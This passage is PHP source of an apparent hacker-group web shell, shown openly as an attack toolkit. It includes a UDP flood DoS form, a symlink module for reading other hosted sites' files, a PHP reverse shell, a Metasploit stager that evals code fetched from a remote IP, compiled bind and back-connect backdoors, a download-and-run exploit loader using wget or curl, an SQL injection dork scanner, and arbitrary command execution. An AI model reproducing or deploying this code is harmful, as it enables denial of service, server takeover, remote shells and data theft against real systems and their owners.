\'0.0.0.0\' ) this.value = \'\';"/>\r\n</td></tr>\r\n<tr><td>Time</td><td>:</td>\r\n<td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value==\'\' ) this.value = \'time (in seconds)\';" onfocus = " if ( this.value == \'time (in seconds)\' ) this.value = \'\';"/>\r\n</td></tr>\r\n\r\n<tr><td>Port</td><td>:</td>\r\n<td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value==\'\' ) this.value = \'port\';" onfocus = " if ( this.value == \'port\' ) this.value = \'\';"/>\r\n</td></tr></tr></table></b><br>\r\n<input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">\r\n<br><br>\r\n<center>\r\nAfter initiating the DoS attack, please wait while the browser loads.\r\n</center>\r\n\r\n</form>\r\n</center>\r\n<?php\r\n$submit = $_POST[\'fire\'];\r\nif (isset($submit)) {\r\n\r\n$packets = 0;\r\n$ip = $_POST[\'ip\'];\r\n$rand = $_POST[\'port\'];\r\nset_time_limit(0);\r\nignore_user_abort(FALSE);\r\n\r\n$exec_time = $_POST[\'time\'];\r\n\r\n$time = time();\r\nprint "Flooded: $ip on port $rand <br><br>";\r\n$max_time = $time+$exec_time;\r\n\r\n\r\n\r\nfor($i=0;$i<65535;$i++){\r\n        $out .= "X";\r\n}\r\nwhile(1){\r\n$packets++;\r\n        if(time() > $max_time){\r\n                break;\r\n        }\r\n        \r\n        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);\r\n        if($fp){\r\n                fwrite($fp, $out);\r\n                fclose($fp);\r\n        }\r\n}\r\necho "Packet complete at ".time(\'h:i:s\')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \\n";\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'symlink\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">\r\n\r\n<?php   \r\n\r\n@set_time_limit(0);\r\n\r\necho "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";\r\n\r\n@mkdir(\'sym\',0777);\r\n$htaccess  = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n  AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n$write =@fopen (\'sym/.htaccess\',\'w\');\r\nfwrite($write ,$htaccess);\r\n@symlink(\'/\',\'sym/root\');\r\n$filelocation = basename(__FILE__);\r\n$read_named_conf = @file(\'/etc/named.conf\');\r\nif(!$read_named_conf)\r\n{\r\necho "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; \r\n}\r\nelse\r\n{\r\necho "<br><br><div class=\'tmp\'><table border=\'1\' bordercolor=\'#00ff00\' width=\'500\' cellpadding=\'1\' cellspacing=\'0\'><td>Domains</td><td>Users</td><td>symlink </td>";\r\nforeach($read_named_conf as $subject){\r\nif(eregi(\'zone\',$subject)){\r\npreg_match_all(\'#zone "(.*)"#\',$subject,$string);\r\nflush();\r\nif(strlen(trim($string[1][0])) >2){\r\n$UID = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$string[1][0]));\r\n$name = $UID[\'name\'] ;\r\n@symlink(\'/\',\'sym/root\');\r\n$name   = $string[1][0];\r\n$iran   = \'\\.ir\';\r\n$israel = \'\\.il\';\r\n$indo   = \'\\.id\';\r\n$sg12   = \'\\.sg\';\r\n$edu    = \'\\.edu\';\r\n$gov    = \'\\.gov\';\r\n$gose   = \'\\.go\';\r\n$gober  = \'\\.gob\';\r\n$mil1   = \'\\.mil\';\r\n$mil2   = \'\\.mi\';\r\n$malay\t= \'\\.my\';\r\n$china\t= \'\\.cn\';\r\n$japan\t= \'\\.jp\';\r\n$austr\t= \'\\.au\';\r\n$porn\t= \'\\.xxx\';\r\n$as\t\t= \'\\.uk\';\r\n$calfn\t= \'\\.ca\';\r\n\r\nif (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])\r\nor eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])\r\nor eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])\r\nor eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))\r\n{\r\n$name = "<div style=\' color: #FF0000 ; text-shadow: 0px 0px 1px red; \'>".$string[1][0].\'</div>\';\r\n}\r\necho "\r\n<tr>\r\n\r\n<td>\r\n<div class=\'dom\'><a target=\'_blank\' href=http://www.".$string[1][0].\'/>\'.$name.\' </a> </div>\r\n</td>\r\n\r\n<td>\r\n\'.$UID[\'name\']."\r\n</td>\r\n\r\n<td>\r\n<a href=\'sym/root/home/".$UID[\'name\']."/public_html\' target=\'_blank\'>Symlink </a>\r\n</td>\r\n\r\n</tr></div> ";\r\nflush();\r\n}\r\n}\r\n}\r\n}\r\n\r\necho "</center></table>";   \r\n\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'domain\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=domain" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>\';\r\n\r\n$file = @implode(@file("/etc/named.conf"));\r\nif(!$file){ die("# can\'t ReaD -> [ /etc/named.conf ]"); }\r\npreg_match_all("#named/(.*?).db#",$file ,$r);\r\n$domains = array_unique($r[1]);\r\n//check();\r\n//if(isset($_GET[\'ShowAll\']))\r\n{\r\necho "<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>\r\n<tr><td>Domain</td><td>User</td></tr>";\r\nforeach($domains as $domain){\r\n$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));\r\n\r\n\t\techo "<tr><td>$domain</td><td>".$user[\'name\']."</td></tr>";\r\n\t\t}\r\n\techo "</table>";\r\n\t}\r\n\r\necho \'</div>\';\r\n}\r\n//////////////////////////////////////////////////////\r\n/////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tool\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=tool" method="post">\r\n<?php\r\n\r\nerror_reporting(0);\r\nfunction ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}\r\n$s_my_ip = gethostbyname($_SERVER[\'HTTP_HOST\']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class=\'mybox\' align=\'center\'><td><h2>Reverse shell ( php )</h2><form method=\'post\' actions=\'?y=<?php echo $pwd;?>&amp;x=\'tool\'><table class=\'tabnet\'><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'rstarget4\' value=\'".$rstarget4."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'sqlportb4\' value=\'".$rsportb4."\' /></td></tr></table><input type=\'submit\' name=\'xback_php\' class=\'inputzbut\' value=\'connect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\' /><input type=\'hidden\' name=\'d\' value=\'".$pwd."\' /></form></td><td><hr color=\'#4C83AF\'><td><td><form method=\'POST\'><table class=\'tabnet\'><h2>Metasploit Connection </h2><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'40\' name=\'yip\' value=\'".$my_ip."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'5\' name=\'yport\' value=\'443\' /></td></tr></table><input class=\'inputzbut\' type=\'submit\' value=\'Connect\' name=\'metaConnect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\'></form></td></div></center></table><br><br />";\r\necho $s_result;\r\nif($_POST[\'metaConnect\']){$ipaddr = $_POST[\'yip\'];$port = $_POST[\'yport\'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable(\'stream_socket_client\')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = \'stream\';}elseif (is_callable(\'fsockopen\')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = \'stream\';}elseif (is_callable(\'socket_create\')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = \'socket\';}else {die();}switch ($msgsock_type){case \'stream\': $len = fread($msgsock, 4); break;case \'socket\': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a[\'len\'];$buffer = \'\';while (strlen($buffer) < $len){switch ($msgsock_type) {case \'stream\': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case \'socket\': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}\r\nif(isset($_REQUEST[\'sqlportb4\'])) $rsportb4 = ss($_REQUEST[\'sqlportb4\']);\r\nif(isset($_REQUEST[\'rstarget4\'])) $rstarget4 = ss($_REQUEST[\'rstarget4\']);\r\nif ($_POST[\'xback_php\']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = \'/bin/sh\';$daemon = 0;$debug = 0;if(function_exists(\'pcntl_fork\')){$pid = pcntl_fork();\r\nif ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}\r\numask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);\r\n$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\r\n$process = proc_open($shell, $descriptorspec, $pipes);\r\nif(!is_resource($process)) exit(1);\r\nstream_set_blocking($pipes[0], 0);\r\nstream_set_blocking($pipes[1], 0);\r\nstream_set_blocking($pipes[2], 0);\r\nstream_set_blocking($sock, 0);\r\nwhile(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\nif(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}\r\nif(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}\r\nif(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}\r\n}\r\n////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whois\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">\r\n   <?php\r\n   @set_time_limit(0);\r\n   @error_reporting(0);\r\n   function sws_domain_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/whois/$site");\r\n   flush();\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_net_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/asinfo/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_site_ser($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/reverseip/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_sup_dom($site)\r\n   {\r\n   $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");\r\n   $ip = @findit($getip,\'<strong>Nameservers found:</strong>\',\'<script type="text/javascript">\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_port_scan($ip)\r\n   {\r\n   $list_post = array(\'80\',\'21\',\'22\',\'2082\',\'25\',\'53\',\'110\',\'443\',\'143\');\r\n   foreach ($list_post as $o_port)\r\n   {\r\n   $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);\r\n   if($connect)\r\n   {\r\n   echo " $ip : $o_port ??? <u style=\\"color: #00ff00\\">Open</u> <br /><br />";\r\n   flush();\r\n   }\r\n   }\r\n   }\r\n   function findit($mytext,$starttag,$endtag) {\r\n   $posLeft = @stripos($mytext,$starttag)+strlen($starttag);\r\n   $posRight = @stripos($mytext,$endtag,$posLeft+1);\r\n   return @substr($mytext,$posLeft,$posRight-$posLeft);\r\n   flush();\r\n   }\r\n   echo \'<br><br><center>\';\r\n   echo \'\r\n    <br />\r\n    <div class="sc"><form method="post"><table class="tabnet">\r\n\t<tr><th colspan="5">Website Whois</th></tr>\r\n    <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>\r\n    </table></form></div>\';\r\n   if(isset($_POST[\'scan\']))\r\n   {\r\n   $site = @htmlentities($_POST[\'site\']);\r\n   if (empty($site)){die(\'<br /><br /> Not add IP .. !\');}\r\n   $ip_port = @gethostbyname($site);\r\n   echo "\r\n   <br /><div class=\\"sc2\\">Scanning [ $site ip $ip_port ] ... </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Port Server ------------------| <br /></div>\r\n   <div class=\\"ru\\"> <br /><br /><pre>\r\n   ";\r\n   echo "".sws_port_scan($ip_port)." </pre></div> ";\r\n   flush();\r\n   echo "<div class=\\"tit\\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_domain_info($site)."</pre></div>";\r\n   flush();\r\n   echo "\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Network Info ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_net_info($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_sup_dom($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- Site Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_site_ser($site)."</pre> </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- END ------------------| <br /></div>";\r\n   flush();\r\n   }\r\n   echo \'</center>\';\r\n   }\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'about\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=about" method="post">\r\n\t<center><br><br><img src=\'http://i.imgur.com/3m7leCw.jpg\'>\r\n    <br><br><br>terimakasih buat teman2 ku yang mau membantu saya menyelesaikan shell saya yang versi v3.1 spesial edition ini\r\n\t<br><br>[ s4mp4h | areg noid | Mr Gãndrunx (Hiddenymouz) | ardan | FH04ZA | antonio HSH | war0x | x shadow | bagonk ]<br>dan semua kawan-kawan ku\r\n\t<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>\r\n<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>\r\n<p><b><font size="3" color="#00ff00">=[ teman-temanku ]=<br><br>Gabby<br>Antonio HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>\r\nUyap<br>\r\nZinbad<br>FH04ZA<br>\r\nSani marpic<br>\r\nMadan Cyber<br>\r\nCah Bagus<br>\r\nRPG<br>Vallent<br>\r\nP4njie_a.k.a<br>\r\nDwi Syntia<br>\r\nÆrul Ringgo\'s<br>\r\nTi\'ar Variabel<br>\r\nImei7<br>\r\nHmei7<br>\r\nDe Vinclous<br>\r\nBlankon33<br>\r\nDoza Cracker<br>\r\nYing Cracker<br>\r\nIranian Hacker<br>\r\nDanger Hacker<br>\r\nAdmin07<br>\r\nZhou you<br>\r\nKsatria.us<br>\r\nCyber Inj3cti0n<br>\r\nK2ll33d<br>\r\nSultan Haikal<br>\r\nSyntax_Error<br>\r\nAqis<br>\r\nBlack Shadow<br>\r\ncrack999<br>\r\nFnatic Crew<br>\r\nCoretan Rizal<br>\r\nMalaikat Maut<br>\r\nDan teman-teman ku semua<br><br>\r\n=[ grup hacking ]=<br><br>\r\nBlack Newbie Team<br>\r\n3xpire Cyber Army<br>\r\nHack Forum<br>\r\nIndonesia Fighter Cyber<br>\r\nBiang Kerox Team<br>\r\nAnonymous<br>Gaza Hacker<br>Albanian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>\r\nX-Code<br>\r\nIndonesian Security<br>\r\nIndonesia Black Cyber<br>\r\nB-Compi<br>\r\nJasakom<br>\r\nMojopahit Fighter Cyber<br>\r\nLappis<br>\r\nMojopahit Cyber Dark<br>\r\nCrack Hack Forum<br>\r\ndan semua grup hacking<br>\r\nyang<br>\r\nsaya naungi dan singgahi<br><br><br>By<br>Cyber173 a.k.a X\'1n73ct<br><br><br>\r\n</font></b></p>\r\n</center>\r\n</marquee></center><br><br><br>\r\n<?php\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sqli-scanner\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> &nbsp;&nbsp;<input class="inputz" type="text" value="" name="dork" style="color:#00ff00;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan"></form></center>\';\r\n\r\nob_start();\r\nset_time_limit(0);\r\n\r\nif (isset($_POST[\'scan\'])) {\r\n\r\n$browser = $_SERVER[\'HTTP_USER_AGENT\'];\r\n\r\n$first = "startgoogle.startpagina.nl/index.php?q=";\r\n$sec = "&start=";\r\n$reg = \'/<p class="g"><a href="(.*)" target="_self" onclick="/\';\r\n\r\nfor($id=0 ; $id<=30; $id++){\r\n$page=$id*10;\r\n$dork=urlencode($_POST[\'dork\']);\r\n$url = $first.$dork.$sec.$page;\r\n\r\n$curl = curl_init($url);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\n$result = curl_exec($curl);\r\ncurl_close($curl);\r\n\r\npreg_match_all($reg,$result,$matches);\r\n}\r\nforeach($matches[1] as $site){\r\n\r\n$url = preg_replace("/=/", "=\'", $site);\r\n$curl=curl_init();\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1);\r\ncurl_setopt($curl,CURLOPT_URL,$url);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\ncurl_setopt($curl,CURLOPT_TIMEOUT,\'5\');\r\n$GET=curl_exec($curl); \r\nif (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * \r\n\r\nFROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { \r\necho \'<center><b><font color="#E10000">Found : </font><a href="\'.$url.\'" target="_blank">\'.$url.\'</a><font color=#FF0000> &#60;-- SQLI Vuln \r\n\r\nFound..</font></b></center>\';\r\nob_flush();flush(); \r\n}else{ \r\necho \'<center><font color="#FFFFFF"><b>\'.$url.\'</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>\';\r\nob_flush();flush(); \r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ \r\nif(isset($_POST[\'uploadcomp\'])){\r\n\tif(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){\r\n\t\t$path = magicboom($_POST[\'path\']);\r\n\t\t$fname = $_FILES[\'file\'][\'name\'];\r\n\t\t$tmp_name = $_FILES[\'file\'][\'tmp_name\'];\r\n\t\t$pindah = $path.$fname;\r\n\t\t$stat = @move_uploaded_file($tmp_name,$pindah);\t\t\r\n\t\tif ($stat) {\r\n\t\t\t$msg = "file uploaded to $pindah";\r\n\t\t}\r\n\t\telse $msg = "failed to upload $fname";\r\n\t}\r\n\telse $msg = "failed to upload $fname";\r\n}\r\nelseif(isset($_POST[\'uploadurl\'])){\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$path = magicboom($_POST[\'path\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\t$pindah = $path.$namafile;\r\n\tif(is_file($pindah)) {\r\n\t\t$msg = "file uploaded to $pindah";\r\n\t}\r\n\telse $msg = "failed to upload $namafile";\r\n\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from computer</th></tr>\r\n<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n</tr>\r\n</table></form>\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from url</th></tr>\r\n<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">\r\n<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php }\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ \r\n\r\n// bind connect with c\r\nif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdc.c",$port_bind_bd_c);\r\n \texe("gcc -o bdc bdc.c");\r\n \texe("chmod 777 bdc");\r\n \t@unlink("bdc.c");\r\n \texe("./bdc ".$port." ".$passwrd." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// bind connect with perl\r\nelseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdp",$port_bind_bd_pl);\r\n\texe("chmod 777 bdp");\r\n \t$p2=which("perl");\r\n \texe($p2." bdp ".$port." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// back connect with c\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcc.c",$back_connect_c);\r\n \texe("gcc -o bcc bcc.c");\r\n \texe("chmod 777 bcc");\r\n \t@unlink("bcc.c");\r\n\texe("./bcc ".$ip." ".$port." &");\r\n\t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\n// back connect with perl\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcp",$back_connect);\r\n\texe("chmod +x bcp");\r\n\t$p2=which("perl");\r\n \texe($p2." bcp ".$ip." ".$port." &");\r\n \t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\nelseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\']))\r\n{\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\tif(is_file($namafile)) {\r\n\t\r\n\t$msg = exe($wcmd);\r\n\t}\r\n\telse $msg = "error: file not found $namafile";\r\n}\r\n\r\n?>\r\n<table class="tabnet">\r\n<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>\r\n<tr>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>\r\n<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr>\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>\r\n<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>\r\n</tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){  ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" readonly>\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo @exe($_POST[\'cmd\']);\r\n}\r\n?>\r\n</textarea>\r\n<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>\r\n</table>\r\n</form>\r\n<?php } \r\nelse { \r\nif(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){\r\n\t$file = $_GET[\'delete\'];\r\n\t@unlink($file);\r\n}\r\nelseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){\r\n\t@rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR));\r\n}\r\nelseif(isset($_GET[\'mkdir\']) && 